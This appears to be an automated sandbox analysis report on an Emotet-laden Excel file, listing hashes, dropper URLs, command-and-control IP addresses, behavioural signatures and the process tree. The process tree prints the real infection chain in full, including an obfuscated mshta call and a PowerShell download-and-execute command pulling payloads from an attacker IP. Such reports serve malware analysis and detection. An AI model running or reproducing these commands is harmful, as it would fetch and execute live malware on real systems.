Analysis

  • max time kernel
    127s
  • max time network
    163s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    28-01-2022 00:59

General

  • Target

    MES 92847.xls

  • Size

    36KB

  • MD5

    ab23d41b000237ca22d4f471e21f45e6

  • SHA1

    7156618b51eb0b2b0cfc9904c44909a1d0f6ebfe

  • SHA256

    b28aff0f795ebee23511aa29eff25b0dd74f59002c5930bac2a5ab1a94f9ab5c

  • SHA512

    addc41a6d0930fcfee704cb8d8381cb6ecb17713989f176e7e26d33b87b37d98cc1e5e5236925c1951d508635fc340dc58e016f160a33a2f90fff68caece9ced

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://91.240.118.168/oo/aa/se.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://91.240.118.168/oo/aa/se.png

Extracted

Family

emotet

Botnet

Epoch5

C2

159.69.43.124:8080

45.79.80.198:443

207.148.81.119:8080

128.199.192.135:8080

118.98.72.86:443

217.182.143.207:443

168.197.250.14:80

116.124.128.206:8080

78.46.73.125:443

185.148.168.15:8080

195.154.146.35:443

85.214.67.203:8080

194.9.172.107:8080

59.148.253.194:443

210.57.209.142:8080

54.38.242.185:443

195.77.239.39:8080

159.69.237.188:443

104.131.62.48:8080

62.171.178.147:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\MES 92847.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3052
    • C:\Windows\SYSTEM32\CMD.EXE
      CMD.EXE /c ms^hta http://91.2^40.118.1^68/oo/aa/s^e.ht^m^l
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:660
      • C:\Windows\system32\mshta.exe
        mshta http://91.240.118.168/oo/aa/se.html
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:2976
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/oo/aa/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:576
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,AADD
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2148
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,AADD
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:2176
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:2640
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Edknlczjyqfh\mdhhggxrhug.jbk",mERPVQUU
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3644
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Edknlczjyqfh\mdhhggxrhug.jbk",DllRegisterServer
                    9⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2896
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 2976 -s 1744
          4⤵
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1504

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\QWER.dll
    MD5

    a7f82cec5d8bc6846b35958c0c3d1679

    SHA1

    d1bb27562426983883d0666f9651872fd42316b5

    SHA256

    cd863e3a79ab407e6aa7fa97cd9b64020311eeebd6e58c87286799d7134e1cdd

    SHA512

    31a1d34cd8ca9b1c2c03798adaecaa15ec778a0a557123c40f6b3f9bd6b29a059d20f54dd0a584d04d4d995cadfe98e27c44ec60851dfd76009df158ea79914e

  • \ProgramData\QWER.dll
    MD5

    a7f82cec5d8bc6846b35958c0c3d1679

    SHA1

    d1bb27562426983883d0666f9651872fd42316b5

    SHA256

    cd863e3a79ab407e6aa7fa97cd9b64020311eeebd6e58c87286799d7134e1cdd

    SHA512

    31a1d34cd8ca9b1c2c03798adaecaa15ec778a0a557123c40f6b3f9bd6b29a059d20f54dd0a584d04d4d995cadfe98e27c44ec60851dfd76009df158ea79914e

  • \ProgramData\QWER.dll
    MD5

    a7f82cec5d8bc6846b35958c0c3d1679

    SHA1

    d1bb27562426983883d0666f9651872fd42316b5

    SHA256

    cd863e3a79ab407e6aa7fa97cd9b64020311eeebd6e58c87286799d7134e1cdd

    SHA512

    31a1d34cd8ca9b1c2c03798adaecaa15ec778a0a557123c40f6b3f9bd6b29a059d20f54dd0a584d04d4d995cadfe98e27c44ec60851dfd76009df158ea79914e

  • memory/576-1471-0x00000233ABAA0000-0x00000233ABAC2000-memory.dmp
    Filesize

    136KB

  • memory/576-1490-0x00000233ABB40000-0x00000233ABB42000-memory.dmp
    Filesize

    8KB

  • memory/576-1492-0x00000233ABB43000-0x00000233ABB45000-memory.dmp
    Filesize

    8KB

  • memory/576-1513-0x00000233ABD50000-0x00000233ABD8C000-memory.dmp
    Filesize

    240KB

  • memory/576-1524-0x00000233AC270000-0x00000233AC2E6000-memory.dmp
    Filesize

    472KB

  • memory/576-1529-0x00000233ABB46000-0x00000233ABB48000-memory.dmp
    Filesize

    8KB

  • memory/2176-1550-0x0000000000C10000-0x0000000000C37000-memory.dmp
    Filesize

    156KB

  • memory/2640-1555-0x00000000006D0000-0x00000000006F7000-memory.dmp
    Filesize

    156KB

  • memory/2640-1557-0x0000000000700000-0x0000000000727000-memory.dmp
    Filesize

    156KB

  • memory/2640-1560-0x0000000004550000-0x0000000004577000-memory.dmp
    Filesize

    156KB

  • memory/2640-1562-0x00000000045C0000-0x00000000045E7000-memory.dmp
    Filesize

    156KB

  • memory/2640-1564-0x0000000004620000-0x0000000004647000-memory.dmp
    Filesize

    156KB

  • memory/2640-1568-0x0000000004790000-0x00000000047B7000-memory.dmp
    Filesize

    156KB

  • memory/2896-1570-0x0000000004580000-0x00000000045A7000-memory.dmp
    Filesize

    156KB

  • memory/2896-1572-0x0000000004C30000-0x0000000004C57000-memory.dmp
    Filesize

    156KB

  • memory/3052-118-0x00007FFB6CF90000-0x00007FFB6CFA0000-memory.dmp
    Filesize

    64KB

  • memory/3052-119-0x00007FFB6CF90000-0x00007FFB6CFA0000-memory.dmp
    Filesize

    64KB

  • memory/3644-1565-0x00000000036D0000-0x00000000036F7000-memory.dmp
    Filesize

    156KB